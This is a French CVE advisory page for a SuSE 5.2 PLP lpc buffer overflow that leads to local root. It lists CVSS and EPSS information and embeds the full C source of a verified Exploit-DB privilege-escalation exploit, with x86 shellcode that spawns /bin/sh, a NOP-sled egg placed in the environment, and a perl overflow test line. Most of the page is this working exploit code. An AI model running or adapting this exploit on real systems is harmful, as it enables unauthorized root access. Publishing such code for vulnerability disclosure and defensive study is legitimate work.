Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
SuSE 5.2 PLP lpc program has a buffer overflow that leads to root compromise.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 19259
Date de publication : 1999-02-02 23h00 +00:00
Auteur : xnec
EDB Vérifié : Yes
// source: https://www.securityfocus.com/bid/328/info
The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc version number, you're vulnerable. The consequences of lpc exploitation are root access for a local user.
/*
Standard overflow for x86 linux lpc. PLP Line Printer Control program, version 4.0.3. Tested on SuSE 5.2 (suidroot). Test your copy of /usr/bin/lpc by trying an /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`;lpc status lp The problematic code is in displayq.c and control_ops.c, where we attempt to fscanf() the lockfile's contents into a fixed length buffer. See the Bugtraq post for full fix information(www.geek-girl.com/bugtraq).
The buffer we're overflowing is 256bytes, and an offset of 0 works just fine. Try in increments of +-100 if it doesn't work for you.
Obviously this is a complete rip of Aleph1's standard overflow program from his paper "smashing the stack for fun and profit".
to compile: gcc -o xnec_lpc xnec_lpc.c
bugs: only sets uid=0, and you may have to have a printer defined (lp on my box).
greets to #sk1llz
-xnec xnec on EF and DALnet, xnec@inferno.tusculum.edu
*/ #include <stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 356
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char pause;
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_esp() - offset;
printf("Using address: 0x%x\n", addr);
printf("\nPLP Line Printer Control program, version 4.0.3 overflow.\n");
printf("Bug found by xnec, code ripped from Aleph1. After running this program, simply compile and run:\n---\n
#include <unistd.h>
void main(){system(\"/bin/bash\");}\n---\n");
scanf("%c", pause);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("`which lpc` attach lp $RET; `which lpc` status lp");
}
Products Mentioned
Configuraton 0
Plp>>Line_printer_control >> Version *
Configuraton 0
Suse>>Suse_linux >> Version 5.2
- Suse>>Suse_linux >> Version 5.2 (Open CPE detail)
